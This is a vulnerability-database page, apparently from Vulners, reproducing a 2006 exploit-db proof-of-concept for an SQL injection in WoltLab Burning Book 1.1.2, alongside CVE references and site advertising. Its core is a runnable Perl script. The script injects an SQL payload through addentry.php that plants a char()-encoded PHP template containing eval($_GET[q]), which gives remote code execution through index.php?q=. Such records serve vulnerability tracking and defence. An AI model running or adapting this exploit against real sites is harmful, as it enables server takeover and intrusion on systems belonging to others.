Lucene search
+L

WoltLab Burning Book 1.1.2 - SQL Injection

🗓️ 16 Oct 2006 00:00:00Reported by ShAnKaRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 55 Views

WoltLab Burning Book 1.1.2 - SQL Injection exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-5508
25 Oct 200622:00
cve
cve
CVE
CVE-2006-5509
25 Oct 200622:00
cve
cvelist
Cvelist
CVE-2006-5508
25 Oct 200622:00
cvelist
cvelist
Cvelist
CVE-2006-5509
25 Oct 200622:00
cvelist
euvd
EUVD
EUVD-2006-5493
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2006-5494
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-5508
25 Oct 200622:07
nvd
nvd
NVD
CVE-2006-5509
25 Oct 200622:07
nvd
#!/usr/bin/perl

# woltlab.de burning book <=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/

use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default `1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent->new();
$ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);

# milw0rm.com [2006-10-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0126
55